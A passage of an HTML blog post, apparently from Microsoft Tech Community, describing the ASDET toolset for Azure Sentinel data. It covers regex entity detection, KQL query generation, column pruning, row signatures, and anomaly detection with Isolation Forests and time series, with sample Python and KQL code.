If you would like to follow along with the example Notebooks, as well as to learn more about ASDET, you can do this at the <A href="#" target="_blank" rel="noopener">GitHub repo</A>.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="znguyen_0-1630697734559.png" style="width: 647px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308011i7A0D7FD3441353F2/image-size/large?v=v2&amp;px=999" role="button" title="znguyen_0-1630697734559.png" alt="znguyen_0-1630697734559.png" /></span></P> <P>&nbsp;</P> <H1><FONT size="5">Data Inference</FONT></H1> <H2>&nbsp;</H2> <H2><FONT size="4">Entity Identification</FONT></H2> <P>You can find the notebook for this section in the identification folder in the <A href="#" target="_self">GitHub repo</A>.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; What are entities in the context of Azure Sentinel? An Azure Sentinel workspace contains many tables, which contain different types of data that we classify into categories called entities. For example, the data of a particular column in a particular table might be an instance of an entity like IP address. <A href="#" target="_blank" rel="noopener">Other common entities</A>&nbsp;include account, host, file, process, and URL. It’s useful for Security Analysts to know what entities are in their dataset because they can then pivot on a suspicious data point or find anomalous events.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The goal of this section is to automatically infer entities in the dataset. We want to do this because entities are key elements for analysts to use in investigations and can be effectively used to join different datasets where common entities occur. We detect entities using regular expressions for the entities and applying these to each column in a table. Since most entities have unique identifiers with patterns specific to that entity, using regular expressions usually leads to accurate results. 
When more than one regular expression matches for a column, we resolve this conflict by first comparing the match percentages and choosing the entity for the regular expression with the highest match percentage. If the match percentages are the same, we use a priority system which assigns a priority level to each entity based on the specificity of the regular expression. For example, an Azure Resource Identifier looks like a Linux or URL path and so also matches the regex for a <EM>file</EM>, so the Azure Resource ID regex has a higher priority than the <EM>file</EM> regex.</P> <P>&nbsp;</P> <P>Note: some entity identifiers such as GUIDs/UUIDs are not generally detectable as entities since patterns like this are not specific to any single entity.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; If an analyst wanted to know the entities in the table OfficeActivity (which contains events related to Office 365 usage), they would simply import the Entity Identification module, select the table from a dropdown list, and run the detection function on it. 
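As an added example (my own code, not ASDET's Entity Identification module), the detection logic described above in plain Python over a constructed table: every entity regex is applied to every column, the match percentage decides, and a priority level breaks ties, so a column of Azure Resource IDs is labelled azure_resource rather than file even though both regexes match every value. The regexes, priorities, 80% match threshold, column names and the queries_for helper (which generates the per-column KQL queries the toolset's autogenerated-queries feature returns) are my assumptions.

```python
import re

# Entity regexes and priorities are my illustrative choices, not ASDET's own.
# When two regexes match the same share of a column, the higher priority wins,
# so the specific Azure Resource ID pattern outranks the general file-path one.
ENTITY_PATTERNS = {
    "ip":             (re.compile(r"(?:\d{1,3}\.){3}\d{1,3}"), 3),
    "account":        (re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"), 3),
    "url":            (re.compile(r"https?://[^\s/]+(?:/\S*)?"), 3),
    "azure_resource": (re.compile(r"/subscriptions/[^/\s]+/resourceGroups/[^/\s]+/providers/\S+", re.I), 2),
    "file":           (re.compile(r"(?:/[^/\s]+)+/?|[A-Za-z]:\\(?:[^\\\s]+\\)*[^\\\s]*"), 1),
}
MATCH_THRESHOLD = 0.8   # share of non-empty values a regex must match (assumption)


def match_percentages(values):
    """Share of a column's non-empty values that each entity regex fully matches."""
    non_empty = [v for v in values if v]
    if not non_empty:
        return {}
    return {name: sum(1 for v in non_empty if rx.fullmatch(v)) / len(non_empty)
            for name, (rx, _priority) in ENTITY_PATTERNS.items()}


def infer_entity(values, threshold=MATCH_THRESHOLD):
    """Entity for one column: highest match percentage first, then highest priority."""
    candidates = [(pct, ENTITY_PATTERNS[name][1], name)
                  for name, pct in match_percentages(values).items() if pct >= threshold]
    return max(candidates)[2] if candidates else None


def infer_table_entities(table):
    """Map each column (dict column -> list of values) to an entity; skip non-entity columns."""
    found = {}
    for column, values in table.items():
        entity = infer_entity(values)
        if entity is not None:
            found[column] = entity
    return found


def queries_for(table_name, column_entities, entity, value):
    """One KQL query per column that holds the given entity type."""
    escaped = value.replace("\\", "\\\\").replace('"', '\\"')
    return [f'{table_name} | where {column} == "{escaped}"'
            for column, found in column_entities.items() if found == entity]


# ---- constructed sample table (illustrative columns, not the real OfficeActivity schema) ----
SAMPLE_TABLE = {
    "UserId": ["mbowen@contoso.com", "jdoe@contoso.com", "", "alice@contoso.com"],
    "ClientIP": ["10.0.0.5", "192.168.1.20", "172.16.3.4"],
    "ResourceId": [
        "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.Compute/virtualMachines/vm1",
        "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.Storage/storageAccounts/st1",
    ],
    "SourceFilePath": ["/home/alice/report.docx", "/tmp/build/log.txt", "C:\\Users\\bob\\notes.txt"],
    "SiteUrl": ["https://contoso.sharepoint.com/sites/hr", "https://contoso.sharepoint.com/sites/finance/docs"],
    "Target": ["10.0.0.1", "n/a", "10.0.0.2", "10.0.0.3", "10.0.0.4"],  # 80% IPs: just passes the threshold
    "Operation": ["FileAccessed", "FileDownloaded", "UserLoggedIn"],      # matches nothing: no entity
}

if __name__ == "__main__":
    entities = infer_table_entities(SAMPLE_TABLE)
    print(entities)
    print(queries_for("OfficeActivity", entities, "account", "mbowen@contoso.com"))
```

The match percentage is computed over non-empty values only, so a sparsely populated column is not penalised for its blanks; the threshold is what keeps a column of free text with a stray IP address from being labelled ip.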
They would then see which entities were found in the table and which columns they correspond to.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture1.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308037i252F82EADAD02F2E/image-size/large?v=v2&amp;px=999" role="button" title="Picture1.gif" alt="Picture1.gif" /></span></P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; In addition, analysts may find visualizations of entity-table relationships helpful, particularly when identifying elements such as common entities between tables.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="znguyen_2-1630697821389.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308013iEC9833F535F5C3A6/image-size/medium?v=v2&amp;px=400" role="button" title="znguyen_2-1630697821389.png" alt="Distribution of entities in dataset" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Distribution of entities in dataset</span></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="znguyen_3-1630697821399.png" style="width: 672px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308012i2A7AA061240A410B/image-size/large?v=v2&amp;px=999" role="button" title="znguyen_3-1630697821399.png" alt="Relationships between tables (red), entities (blue), and columns (orange)" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Relationships between tables (red), entities (blue), and columns (orange)</span></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="znguyen_4-1630697821417.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308017i6D0DAEC04C1FED2B/image-size/large?v=v2&amp;px=999" 
role="button" title="znguyen_4-1630697821417.png" alt="Flow from entity to table" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Flow from entity to table</span></span></P> <H2><FONT size="4">Autogenerated KQL Queries</FONT></H2> <P data-unlink="true">&nbsp; &nbsp; &nbsp; Using the results of the previous section, our toolset also allows users to autogenerate KQL queries to investigate a specific instance of an entity. For example, if the analyst wanted to know where the user mbowen@contoso.com&nbsp; appears in the dataset, they would pass the email address as well as its entity type, which is account, into the query function. A list of KQL queries is returned which can be run to find where the mbowen@contoso.com&nbsp; email is found.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="9ELNb8iWXv.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308036i3816A3F804385A28/image-size/large?v=v2&amp;px=999" role="button" title="9ELNb8iWXv.gif" alt="9ELNb8iWXv.gif" /></span></P> <H1><FONT size="5">Feature Engineering</FONT></H1> <P>You can find the notebook for this section in the feature engineering folder in the <A href="#" target="_self">GitHub repo</A>.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; What is feature engineering? When dealing with large datasets, it is often impossible to develop models that use the entirety of the features (columns within the dataset) available to us in the feature space. 
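The cleaning and signature steps this section goes on to describe, as an added stand-alone example (my code, not ASDET's cleanTable or DataSignature). It works on plain lists of dicts rather than a pandas DataFrame, applies invariant-column removal, duplicate-column removal, entropy-based thresholds and a regex-based prune for GUID columns, then builds the binary row signatures and finds the values that uniquely identify each signature. The thresholds, the GUID rule, the column names and the sample rows are my assumptions.

```python
import math
import re
from collections import Counter

# Thresholds and the GUID rule are my illustrative choices, not ASDET's defaults.
ENTROPY_MIN = 0.3     # below this the column is nearly constant
ENTROPY_MAX = 0.98    # above this the column is nearly unique per row (an identifier)
GUID_RX = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)
EMPTY = (None, "")


def column_entropy(values):
    """Shannon entropy of a column, normalised to [0, 1] by log2 of the row count."""
    n = len(values)
    if n < 2:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(values).values()) / math.log2(n)


def clean_table(rows, columns):
    """Return the columns that survive invariant, duplicate, regex and entropy pruning."""
    kept, seen = [], set()
    for col in columns:
        values = [r.get(col) for r in rows]
        if len(set(values)) == 1:                       # invariant column: no information
            continue
        if tuple(values) in seen:                       # duplicate of an earlier kept column
            continue
        present = [v for v in values if v not in EMPTY]
        if present and all(GUID_RX.fullmatch(str(v)) for v in present):
            continue                                    # regex prune: GUIDs are not entities
        h = column_entropy(values)
        if h < ENTROPY_MIN or h > ENTROPY_MAX:          # entropy-based threshold
            continue
        seen.add(tuple(values))
        kept.append(col)
    return kept


def row_signature(row, columns):
    """Binary signature: '1' where the column holds a value, '0' where it is empty."""
    return "".join("0" if row.get(c) in EMPTY else "1" for c in columns)


def signature_counts(rows, columns):
    """How often each signature occurs; rare ones are the candidate anomalous signatures."""
    return Counter(row_signature(r, columns) for r in rows)


def find_uniques(rows, columns):
    """Values that occur under exactly one signature, as {signature: {column: [values]}};
    such values identify that signature."""
    owners = {}
    for r in rows:
        sig = row_signature(r, columns)
        for c in columns:
            if r.get(c) not in EMPTY:
                owners.setdefault((c, r[c]), set()).add(sig)
    uniques = {}
    for (c, v), sigs in owners.items():
        if len(sigs) == 1:
            uniques.setdefault(next(iter(sigs)), {}).setdefault(c, []).append(v)
    return uniques


# ---- constructed sample rows (illustrative columns, not the real OfficeActivity schema) ----
COLUMNS = ["TenantId", "Operation", "UserId", "ClientIP", "Site", "EventId", "CorrelationId", "OperationCopy"]
_G1 = "11111111-1111-1111-1111-111111111111"   # placeholder GUIDs
_G2 = "22222222-2222-2222-2222-222222222222"


def _row(op, user, ip, site, event, corr):
    return {"TenantId": "contoso", "Operation": op, "UserId": user, "ClientIP": ip,
            "Site": site, "EventId": event, "CorrelationId": corr, "OperationCopy": op}


SAMPLE_ROWS = [
    _row("FileAccessed",   "alice@contoso.com", "10.0.0.1",    "hr",      "e1", _G1),
    _row("FileAccessed",   "bob@contoso.com",   "10.0.0.2",    "hr",      "e2", _G2),
    _row("FileDownloaded", "alice@contoso.com", "10.0.0.1",    "finance", "e3", _G1),
    _row("FileAccessed",   "carol@contoso.com", "10.0.0.3",    "hr",      "e4", _G2),
    _row("FileDownloaded", "bob@contoso.com",   "10.0.0.2",    "hr",      "e5", _G1),
    _row("UserLoggedIn",   "alice@contoso.com", "10.0.0.1",    "",        "e6", _G2),
    _row("FileAccessed",   "carol@contoso.com", "10.0.0.3",    "finance", "e7", _G1),
    _row("MailboxLogin",   "",                  "203.0.113.9", "",        "e8", _G2),
]

if __name__ == "__main__":
    kept = clean_table(SAMPLE_ROWS, COLUMNS)
    print("kept columns:", kept)
    print("signatures:", signature_counts(SAMPLE_ROWS, kept))
    print("uniques:", find_uniques(SAMPLE_ROWS, kept))
```

On the sample, TenantId goes as invariant, EventId as near-unique, OperationCopy as a duplicate and CorrelationId by the GUID rule (its entropy alone would have kept it), leaving four columns. Two of the eight rows then have rare signatures, and the values only ever seen under those signatures (the MailboxLogin operation and its source IP) are exactly the pivots an analyst would want.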
We use feature engineering to pick and choose the most important features.&nbsp; However, when dealing with unknown data, it is often time-consuming to pick and choose the most important features, so we developed a programmatic way to reduce the dimensionality of a dataset by picking features that are relevant to us.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; Our toolset is composed of two broad areas: the data cleaning toolkit and the data signature toolkit.&nbsp; The data cleaning toolkit is composed of several functions that were able to reduce features (columns) in datasets by approximately 50%.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; To clean the table automatically, we can simply import our module and call our function on our Pandas DataFrame.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="python">from utils import cleanTable

# df is the pandas DataFrame holding the table; the cleaned copy is returned
result = cleanTable(df)</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>The cleanTable module contains functions for the following tasks:</P> <UL> <LI><A href="#" target="_self">Dimensionality reduction using entropy-based thresholds</A></LI> <LI><A href="#" target="_self">Invariant column removal</A></LI> <LI><A href="#" target="_self">Duplicate column removal</A></LI> <LI><A href="#" target="_self">Table Binarization Mapping</A>&nbsp;</LI> <LI><A href="#" target="_self">Regular expression-based pruning</A></LI> </UL> <P>&nbsp; &nbsp; &nbsp; The table below shows the result of running feature engineering on our sample dataset “Office Activity”.&nbsp; It managed to reduce the number of columns from 131 columns to the 46 most important columns.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="before_after.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308035i57038AEC9536B1F0/image-size/large?v=v2&amp;px=999" role="button" title="before_after.png" alt="Top: Original table. 
Bottom: Cleaned table" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Top: Original table. Bottom: Cleaned table</span></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The data signature toolkit builds on the Binarization Mapping function mentioned previously. It works by assigning a “signature” to each unique row of data based on whether columns are populated with data or not. In the binary signature, a 1 means the column holds a value and a 0 means it is empty. For example, 1100 would indicate that the first two columns are filled in and the last two columns are not.&nbsp; We can use data signatures to learn more about the following:</P> <UL> <LI>Underlying feature distributions under the signature</LI> <LI>Anomalous data signatures based on frequency and value</LI> <LI>Optimal pivot columns</LI> <LI>Unique values that can be used to identify certain data signatures</LI> </UL> <P>&nbsp; &nbsp; &nbsp; To use the data signature toolkit, we import the module, build a DataSignature from our Pandas DataFrame, generate the signatures, and call the <EM>findUniques</EM> function.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="python">from signature import DataSignature

data = DataSignature(df)      # df is the (cleaned) pandas DataFrame
data.generateSignatures()     # one binary signature per row
data.findUniques()            # values that identify each signature</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>The animated GIF below shows us an example of how the data signature notebook works.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="signatureGeneratoin.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308034iC29465111057DBEC/image-size/large?v=v2&amp;px=999" role="button" title="signatureGeneratoin.gif" alt="Data signature example notebook" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Data signature example notebook</span></span></P> <H1><FONT size="5">Anomaly Detection</FONT></H1> <P>&nbsp; &nbsp; &nbsp; Anomalies can be defined as any data point that does 
not follow a normal behavior. Anomaly detection can be very effective in security analysis by helping focus analysts on key events which would otherwise be very difficult to find in large datasets.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; ASDET Anomaly Detection gives security analysts the option to explore data and identify anomalies through user-selected entities (obtained using the data inference described earlier) and other features (data columns) whilst reducing the need to code and model. We have implemented two anomaly modeling methods – Isolation Forests and Time Series Analysis.</P> <H2><FONT size="4">Isolation Forests</FONT></H2> <P>&nbsp; &nbsp; &nbsp; You can find the notebook for this section in the isolation forest folder in the <A href="#" target="_self">GitHub repo</A>.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; A security analyst can identify anomalies in any Azure Log Analytics table through the Isolation Forests ML model. They can do this by selecting a table, an entity, other features (columns), and the time range. The entities can be easily derived by using the Entity Identification feature of ASDET that we covered earlier in the blog, and are presented to the user in a drop-down menu. After selecting entities and features, the data is cleaned and the machine learning model – Isolation Forests – is used to identify the anomalies using an anomaly score which is generated for each datapoint, classifying how anomalous it is. 
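To show where the score and the anomalous/non-anomalous flag come from, here is an added example (my code, not ASDET's notebook) of a from-scratch Isolation Forest over constructed per-user features: a point that a few random splits isolate gets a score near 1, while points buried in the bulk of the data land around 0.5 or below. The 0.7 flag threshold follows the post's reading of what counts as a high score; the feature choice (logins, distinct operations, distinct client IPs), tree count and sample users are my assumptions.

```python
import math
import random

EULER_GAMMA = 0.5772156649


def _c(n):
    """Average path length of an unsuccessful BST search on n points, the
    normaliser from the Isolation Forest paper."""
    if n <= 1:
        return 0.0
    return 2.0 * (math.log(n - 1) + EULER_GAMMA) - 2.0 * (n - 1) / n


def _build_tree(points, depth, max_depth, rng):
    """Split on a random feature at a random value between its min and max.
    Nodes are ("leaf", size) or ("split", feature, value, left, right)."""
    if depth >= max_depth or len(points) <= 1:
        return ("leaf", len(points))
    feature = rng.randrange(len(points[0]))
    lo = min(p[feature] for p in points)
    hi = max(p[feature] for p in points)
    if lo == hi:                          # nothing left to separate on this feature
        return ("leaf", len(points))
    value = rng.uniform(lo, hi)
    left = [p for p in points if p[feature] < value]
    right = [p for p in points if p[feature] >= value]
    return ("split", feature, value,
            _build_tree(left, depth + 1, max_depth, rng),
            _build_tree(right, depth + 1, max_depth, rng))


def _path_length(tree, point, depth=0):
    """Depth at which the point lands, plus the estimated depth of the leaf's subtree."""
    if tree[0] == "leaf":
        return depth + _c(tree[1])
    _, feature, value, left, right = tree
    return _path_length(left if point[feature] < value else right, point, depth + 1)


class IsolationForest:
    """Minimal Isolation Forest: anomaly score in (0, 1], near 1 = isolated quickly."""

    def __init__(self, n_trees=100, sample_size=256, seed=0):
        self.n_trees, self.sample_size, self.seed = n_trees, sample_size, seed

    def fit(self, points):
        rng = random.Random(self.seed)
        self.n = min(self.sample_size, len(points))
        max_depth = math.ceil(math.log2(self.n)) if self.n > 1 else 0
        self.trees = [_build_tree(rng.sample(points, self.n), 0, max_depth, rng)
                      for _ in range(self.n_trees)]
        return self

    def score(self, point):
        if self.n < 2:
            return 0.5
        mean_path = sum(_path_length(t, point) for t in self.trees) / len(self.trees)
        return 2 ** (-mean_path / _c(self.n))


# ---- constructed per-user features (not data from the post) ----------------
# (login count, distinct operations, distinct client IPs) over the chosen time range
_gen = random.Random(42)
USERS = {f"user{i:02d}@contoso.com": (_gen.randint(5, 20), _gen.randint(1, 3), _gen.randint(1, 2))
         for i in range(19)}
USERS["mbowen@contoso.com"] = (400, 12, 9)   # the constructed outlier


def score_users(users, threshold=0.7, seed=0):
    """Score every user: (anomaly score, flag) with flag 1 = anomalous, 0 = not.
    The threshold follows the post's reading that a score around 0.7 is high."""
    names = list(users)
    points = [tuple(float(x) for x in users[n]) for n in names]
    forest = IsolationForest(n_trees=100, seed=seed).fit(points)
    result = {}
    for name, p in zip(names, points):
        s = forest.score(p)
        result[name] = (s, 1 if s >= threshold else 0)
    return result


if __name__ == "__main__":
    for name, (s, flag) in sorted(score_users(USERS).items(), key=lambda kv: -kv[1][0]):
        print(f"{name:24s} score={s:.3f} flag={flag}")
```

The trees are built from the full 20-user sample with depth capped at ceil(log2(n)), as in the original algorithm; the constructed outlier is split off at depth 1 in nearly every tree, which is what drives its score well above the others.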
<SPAN>For example, an anomaly score of 0.7 indicates a highly anomalous datapoint, whereas 0.1 indicates a normal one.&nbsp;</SPAN></P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; You can learn more about the Isolation Forest algorithm here: <A href="#" target="_blank" rel="noopener">Isolation forest - Wikipedia</A></P> <P>These anomalies and their scores matter because they help security analysts identify users exhibiting unusual (and possibly suspicious) activity that would otherwise be challenging to spot within a large dataset. Security Analysts can then further explore this flagged data through various visualization methods and single out any areas they determine to be malicious.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; In the animation below, the user selects entities, features and a time range. A subset of the selected Azure Sentinel table is then created from those selections, and the data is modeled to obtain any anomalous users.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="User_selection.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308044iAB3715A8E8BCB89E/image-size/large?v=v2&amp;px=999" role="button" title="User_selection.gif" alt="User_selection.gif" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; After modeling, each user is marked as anomalous or not: a flag of <EM>1</EM> indicates an <EM>anomalous user</EM> and a flag of <EM>0</EM> a <EM>non-anomalous user</EM>. Here, nine datapoints are marked anomalous because of a high number of Login Times, Operations, and other user-selected columns.&nbsp; Outputs are available in several formats, such as Excel or a DataFrame, either with the data itself or with counts of distinct occurrences. 
This is shown in the following animation.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Modeling2.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308046i6DB5CFE9425ACB90/image-size/large?v=v2&amp;px=999" role="button" title="Modeling2.gif" alt="Modeling2.gif" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The following image shows a histogram of the obtained Anomaly Scores for each user, with a right tail and adjustable bin sizes. This visualization shows how the anomaly scores are distributed across the modeled data.</P> <P>&nbsp;</P> <P>&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="anomaly_score.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308049iA4351C5E0D917A36/image-size/large?v=v2&amp;px=999" role="button" title="anomaly_score.png" alt="X – axis = Anomaly Score, Y-axis = Number of total occurrences" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">X – axis = Anomaly Score, Y-axis = Number of total occurrences</span></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The following image shows a line graph of the total number of logins for each user. The highest points signify anomalies and are further visualized in another line graph. 
This visualization shows how the number of logins per user is distributed across the modeled data.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="total_logins.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308050i1C0F203C204F556A/image-size/large?v=v2&amp;px=999" role="button" title="total_logins.png" alt="X – axis = User, Y-axis = Number of total logins" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">X – axis = User, Y-axis = Number of total logins</span></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The following animation shows a series of bar graphs, one per anomalous user, visualizing the distribution of their total logins over time. This shows how often a user has logged in and whether their logins are consistent or unexpected (suspicious).</P> <P>X – axis = Dates (YYYY-MM-DD), Y-axis = Number of total logins</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="time_series.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308054iEF0AE17AE0C1BE43/image-size/large?v=v2&amp;px=999" role="button" title="time_series.gif" alt="time_series.gif" /></span></P> <P>&nbsp;</P> <H2><FONT size="4">Multivariate Timeseries</FONT></H2> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; You can find the sample notebook for this section in the anomaly folder in the <A href="#" target="_self">GitHub repo</A>.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; What are time series? 
Time series are a way for us to measure one or more variables with respect to time.&nbsp; This is useful when dealing with security log data because all of the features (columns) in security logs have an associated time stamp.&nbsp; In our case, we are modelling the distinct values within a feature per hour (e.g., number of distinct client IP addresses) using the <A href="#" target="_self">MSTICPy Time Series decomposition functions</A>.&nbsp; By generating a set of time series models for a set of features, we can identify common trends during certain time periods for all selected features at once.&nbsp; This allows analysts to more quickly analyze multiple features at once within a time series.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; *Please note that this method is not truly multivariate timeseries analysis, but rather we independently generate the time series for each individual feature and form a composite image representing the dataset. It also allows users to discern if a timeframe is anomalous within a single feature or multiple features.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The user first selects a table to analyze. 
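</P> <P>&nbsp; &nbsp; &nbsp; The same per-feature construction can be expressed directly in KQL against the workspace. The query below is an added example, not ASDET's notebook code (which does this in Python with MSTICPy): it builds one hourly distinct-count series per feature, decomposes each series independently, and then composes the results so that every anomalous hour shows which features flagged it. The table (SigninLogs), the three features and the 14-day window are assumptions chosen for illustration.</P>

```kusto
// Added example, not ASDET's notebook code. Assumptions: the SigninLogs table, the three
// features below and a 14-day window; swap in any table and columns you want to profile.
let lookback = 14d;
SigninLogs
| where TimeGenerated between (ago(lookback) .. now())
// One hourly series per feature: the number of distinct values seen in each hour
| make-series DistinctIPs   = dcount(IPAddress),
              DistinctUsers = dcount(UserPrincipalName),
              DistinctApps  = dcount(AppDisplayName)
              on TimeGenerated from ago(lookback) to now() step 1h
// Each feature is decomposed on its own (threshold 1.5, auto-detected seasonality, linear trend),
// which is exactly why the result is a composite of univariate models rather than a multivariate one
| extend (IPAnom, IPScore, IPBase)       = series_decompose_anomalies(DistinctIPs, 1.5, -1, 'linefit')
| extend (UserAnom, UserScore, UserBase) = series_decompose_anomalies(DistinctUsers, 1.5, -1, 'linefit')
| extend (AppAnom, AppScore, AppBase)    = series_decompose_anomalies(DistinctApps, 1.5, -1, 'linefit')
// Turn the parallel arrays back into one row per hour
| mv-expand TimeGenerated to typeof(datetime),
            DistinctIPs to typeof(long),   IPAnom to typeof(int),   IPBase to typeof(real),
            DistinctUsers to typeof(long), UserAnom to typeof(int), UserBase to typeof(real),
            DistinctApps to typeof(long),  AppAnom to typeof(int),  AppBase to typeof(real)
// Composite view: which features flagged this hour, and how many of them did
| extend AnomalousFeatures = set_difference(
      pack_array(iff(IPAnom != 0, "DistinctIPs", ""),
                 iff(UserAnom != 0, "DistinctUsers", ""),
                 iff(AppAnom != 0, "DistinctApps", "")),
      pack_array(""))
| extend FeatureCount = array_length(AnomalousFeatures)
| where FeatureCount != 0
| project TimeGenerated, FeatureCount, AnomalousFeatures,
          DistinctIPs, IPBase, DistinctUsers, UserBase, DistinctApps, AppBase
| order by FeatureCount desc, TimeGenerated asc
```

<P>&nbsp; &nbsp; &nbsp; Because each feature is decomposed separately, an hour with a FeatureCount of 1 is anomalous in one feature only, while a higher count marks a timeframe that is unusual across several features at once; that is the composite view the notebook renders, and the distinction the note above draws between a single-feature and a multi-feature anomaly.</P> <P>&nbsp; &nbsp; &nbsp; 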
From there, they can select a subset of features as well as a timeframe they want to analyze.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="timeSeriesSelection.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308033iB3DA736D948C19D2/image-size/large?v=v2&amp;px=999" role="button" title="timeSeriesSelection.gif" alt="Selecting a subset of features and a timeframe" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Selecting a subset of features and a timeframe</span></span></P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The user can then query the data automatically for that time frame, model the time series, and map anomalies to the time stamps.&nbsp; The result is a table displaying the timestamps at which anomalies occur.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="anomalyTable.PNG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308032i9EC04EE418B27F26/image-size/large?v=v2&amp;px=999" role="button" title="anomalyTable.PNG" alt="Table containing anomalous features at a given timestamp" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Table containing anomalous features at a given timestamp</span></span></P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The user can then choose a time range to view, and a graph displaying the distinct values per hour will be displayed with the anomalies marked in red.</P> <H2><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="visualizeTimeSeries.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308031iC1DD6CD06142F18D/image-size/large?v=v2&amp;px=999" role="button" title="visualizeTimeSeries.gif" alt="Visualizing anomalies" /><span class="lia-inline-image-caption" 
